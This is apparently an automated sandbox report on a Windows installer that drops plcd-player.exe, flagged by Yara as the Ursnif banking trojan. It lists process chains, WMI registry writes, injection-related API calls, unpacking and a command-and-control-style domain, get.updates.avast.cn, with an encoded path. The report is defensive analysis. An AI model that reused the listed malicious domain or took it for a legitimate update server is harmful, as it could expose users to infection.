Source: plcd-player.exe, 00000011.00000002.529360023.0000000002C6A000.00000004.00000001.sdmp	String found in binary or memory: https://get.updates.avast.cn/
Source: plcd-player.exe, 00000011.00000002.529180964.0000000002BC2000.00000004.00000001.sdmp	String found in binary or memory: https://get.updates.avast.cn/$$
Source: plcd-player.exe, 00000011.00000002.529360023.0000000002C6A000.00000004.00000001.sdmp	String found in binary or memory: https://get.updates.avast.cn/SN
Source: plcd-player.exe, 00000011.00000002.529180964.0000000002BC2000.00000004.00000001.sdmp	String found in binary or memory: https://get.updates.avast.cn/rentVersion
Source: plcd-player.exe, 00000011.00000002.529360023.0000000002C6A000.00000004.00000001.sdmp	String found in binary or memory: https://get.updates.avast.cn/sreamble/g9_2FKpoNdUnXGannE6/i8VP6bKIH0KEVZxtH_2Fnm/ZbHMSZIAuG_2F/S_2FZ
Source: jXzrIReInY.exe, AWSSDK.SimpleDB.dll.4.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.4.dr	String found in binary or memory: https://secure.comodo.com/CPS0L
Source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: jXzrIReInY.exe, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, AWSSDK.SimpleDB.dll.4.dr, MSIA463.tmp.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	String found in binary or memory: https://www.globalsign.com/repository/03
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.4.dr	String found in binary or memory: https://www.nuget.org/packages/Azure.Security.KeyVault.Certificates
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.4.dr	String found in binary or memory: https://www.nuget.org/packages/Azure.Security.KeyVault.Keys
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.4.dr	String found in binary or memory: https://www.nuget.org/packages/Azure.Security.KeyVault.Secrets
Source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown

DNS traffic detected: queries for: get.updates.avast.cn

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Code function: 17_2_001C03A0 RtlEnterCriticalSection,RtlLeaveCriticalSection,Sleep,select,__WSAFDIsSet,WSARecv,WSAGetLastError,RtlLeaveCriticalSection,

17_2_001C03A0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000011.00000002.530869037.0000000003BA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plcd-player.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: 17.2.plcd-player.exe.35f94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.plcd-player.exe.35f94a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.plcd-player.exe.2ce0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.530777240.00000000035F9000.00000004.00000040.sdmp, type: MEMORY

Source: plcd-player.exe, 00000011.00000002.528124057.00000000010CA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000011.00000002.530869037.0000000003BA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plcd-player.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: 17.2.plcd-player.exe.35f94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.plcd-player.exe.35f94a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.plcd-player.exe.2ce0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.530777240.00000000035F9000.00000004.00000040.sdmp, type: MEMORY

System Summary:

PE file has a writeable .text section

Show sources

Source: plcd-player.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: plcd-player.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Writes or reads registry keys via WMI

Show sources

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: jXzrIReInY.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI9CCF.tmp

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\3e96f3.msi

Jump to behavior

Source: C:\Users\user\Desktop\jXzrIReInY.exe	Code function: 0_3_03BC579B	0_3_03BC579B
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Code function: 0_3_03BC579B	0_3_03BC579B
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_02CEAFC0	17_2_02CEAFC0
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_02CE7FBE	17_2_02CE7FBE
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_02CE836E	17_2_02CE836E
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_001E0130	17_2_001E0130
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_003574B9	17_2_003574B9
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_003644AF	17_2_003644AF
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_00373483	17_2_00373483
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_003735A3	17_2_003735A3
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_001D75D0	17_2_001D75D0
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_001FB960	17_2_001FB960
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_001CAAB0	17_2_001CAAB0
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_001D6AF0	17_2_001D6AF0
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_00205D70	17_2_00205D70
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_001DAF30	17_2_001DAF30

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_001A1C90 GetProcAddress,NtCreateSection,memset,	17_2_001A1C90
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_001A1703 NtMapViewOfSection,	17_2_001A1703
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_001A19A0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	17_2_001A19A0
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_02CE9A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	17_2_02CE9A0F
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_02CEB1E5 NtQueryVirtualMemory,	17_2_02CEB1E5

Source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePrereq.dllF vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000000.257395816.000000000049D000.00000002.00020000.sdmp	Binary or memory string: OriginalFileNameplcd-player.exe> vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameicuio58.dll vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUtilities_HelperlL vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamelibeay32.dllH vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Azure.KeyVault.Core.dll> vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSslCertBinding.Net.dllH vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamessleay32.dllH vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSystem.Threading.Tasks.dllP vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameJDesktop.tools vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAWSSDK.SimpleDB.dllb! vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDelimon.Win32.IO.dllD vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dll8 vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamelzmaextractor.dllF vs jXzrIReInY.exe
Source: jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAICustAct.dllF vs jXzrIReInY.exe
Source: jXzrIReInY.exe	Binary or memory string: OriginalFileNameplcd-player.exe> vs jXzrIReInY.exe
Source: jXzrIReInY.exe	Binary or memory string: OriginalFilenameDecoder.dllF vs jXzrIReInY.exe

Source: jXzrIReInY.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: plcd-player.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: plcd-player.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\jXzrIReInY.exe	Section loaded: lpk.dll	Jump to behavior
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Section loaded: libftl2.dll	Jump to behavior

Source: Delimon.Win32.IO.dll.0.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: jXzrIReInY.exe	Virustotal: Detection: 52%
Source: jXzrIReInY.exe	Metadefender: Detection: 22%
Source: jXzrIReInY.exe	ReversingLabs: Detection: 35%

Source: C:\Users\user\Desktop\jXzrIReInY.exe

File read: C:\Users\user\Desktop\jXzrIReInY.exe

Jump to behavior

Source: jXzrIReInY.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\jXzrIReInY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\jXzrIReInY.exe "C:\Users\user\Desktop\jXzrIReInY.exe"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C5EB72BDE2B80B60A07F51ECA26339C7 C
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\jXzrIReInY.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1637876902 " AI_EUIMSI="
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 54779E8B78CD501470CD2E1995D98D79
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\jXzrIReInY.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1637876902 " AI_EUIMSI="	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C5EB72BDE2B80B60A07F51ECA26339C7 C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 54779E8B78CD501470CD2E1995D98D79	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Jump to behavior

Source: C:\Users\user\Desktop\jXzrIReInY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\jXzrIReInY.exe

File created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project

Jump to behavior

Source: C:\Users\user\Desktop\jXzrIReInY.exe

File created: C:\Users\user~1\AppData\Local\Temp\shi1C.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/70@1/0

Source: C:\Users\user\Desktop\jXzrIReInY.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: System.Threading.Tasks.dll.0.dr, Runtime.CompilerServices/AsyncMethodTaskCache<TResult>.cs	Task registration methods: 'CreateCache', 'CreateCompleted'
Source: System.Threading.Tasks.dll.0.dr, Runtime.CompilerServices/AsyncTaskMethodBuilder<TResult>.cs	Task registration methods: 'Create'
Source: System.Threading.Tasks.dll.0.dr, Runtime.CompilerServices/AsyncTaskMethodBuilder.cs	Task registration methods: 'Create'

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Code function: 17_2_02CE8F1B CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

17_2_02CE8F1B

Source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp

Binary or memory string: c:\b\4741\2125\src\intermediate\System.Threading.Tasks.v2.5.csproj_75e1c727\Release\System.Threading.Tasks.pdb

Source: ICSharpCode.SharpZipLib.dll.0.dr, ICSharpCode.SharpZipLib/Zip/Compression/Streams/InflaterInputBuffer.cs	Cryptographic APIs: 'TransformBlock'
Source: ICSharpCode.SharpZipLib.dll.0.dr, ICSharpCode.SharpZipLib/Zip/Compression/Streams/InflaterInputBuffer.cs	Cryptographic APIs: 'TransformBlock'
Source: ICSharpCode.SharpZipLib.dll.0.dr, ICSharpCode.SharpZipLib/Zip/Compression/Streams/DeflaterOutputStream.cs	Cryptographic APIs: 'TransformBlock'
Source: ICSharpCode.SharpZipLib.dll.0.dr, ICSharpCode.SharpZipLib/Encryption/ZipAESTransform.cs	Cryptographic APIs: 'TransformBlock'

Source: C:\Users\user\Desktop\jXzrIReInY.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: jXzrIReInY.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: jXzrIReInY.exe

Static file information: File size 7840296 > 1048576

Source: jXzrIReInY.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x183c00

Source: jXzrIReInY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: jXzrIReInY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: jXzrIReInY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: jXzrIReInY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: jXzrIReInY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: jXzrIReInY.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: jXzrIReInY.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: jXzrIReInY.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\Data\SkyDrive\Programming\Projects\Delimon\Delimon.Win32.IO 2013\Win32FileLibrary\obj\Release\Delimon.Win32.IO.pdb source: jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp, Delimon.Win32.IO.dll.0.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb source: jXzrIReInY.exe, decoder.dll.0.dr
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\ssleay32.pdb @ source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\Decoder.pdb2 source: jXzrIReInY.exe, decoder.dll.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr
Source:	Binary string: E:\JenkinsWorkspaces\v3-trebuchet-release\AWSDotNetPublic\sdk\src\Services\SimpleDB\obj\net35\Release\net35\AWSSDK.SimpleDB.pdbp source: jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.4.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb] source: jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdbk source: jXzrIReInY.exe
Source:	Binary string: D:\a\1\s\artifacts\obj\Microsoft.Azure.KeyVault.Core\Release\net452\Microsoft.Azure.KeyVault.Core.pdb source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.4.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr
Source:	Binary string: C:\JobRelease\win\Release\stubs\x86\ExternalUi.pdb source: jXzrIReInY.exe
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdb source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp
Source:	Binary string: E:\JenkinsWorkspaces\v3-trebuchet-release\AWSDotNetPublic\sdk\src\Services\SimpleDB\obj\net35\Release\net35\AWSSDK.SimpleDB.pdb source: jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.4.dr
Source:	Binary string: C:\Users\User\AppData\Local\Temp\icu_32\lib\icuio.pdb source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\Prereq.pdbi source: jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\User\AppData\Local\Temp\icu_32\lib\icuio.pdb"" source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\ssleay32.pdb source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\libeay32.pdb0k source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp
Source:	Binary string: C:\OpenSSL\Temp\openssl-1.0.2g-x32\out32dll\libeay32.pdb source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp
Source:	Binary string: c:\b\4741\2125\src\intermediate\System.Threading.Tasks.v2.5.csproj_75e1c727\Release\System.Threading.Tasks.pdb source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp
Source:	Binary string: D:\a\1\s\artifacts\obj\Microsoft.Azure.KeyVault.Core\Release\net452\Microsoft.Azure.KeyVault.Core.pdbSHA256 source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.4.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbj source: jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr
Source:	Binary string: d:\projects\SslCertBinding.Net\src\SslCertBinding.Net\obj\Release\SslCertBinding.Net.pdb source: jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\lzmaextractor.pdb source: jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp

Source: jXzrIReInY.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: jXzrIReInY.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: jXzrIReInY.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: jXzrIReInY.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: jXzrIReInY.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Unpacked PE file: 17.2.plcd-player.exe.1a0000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Unpacked PE file: 17.2.plcd-player.exe.1a0000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

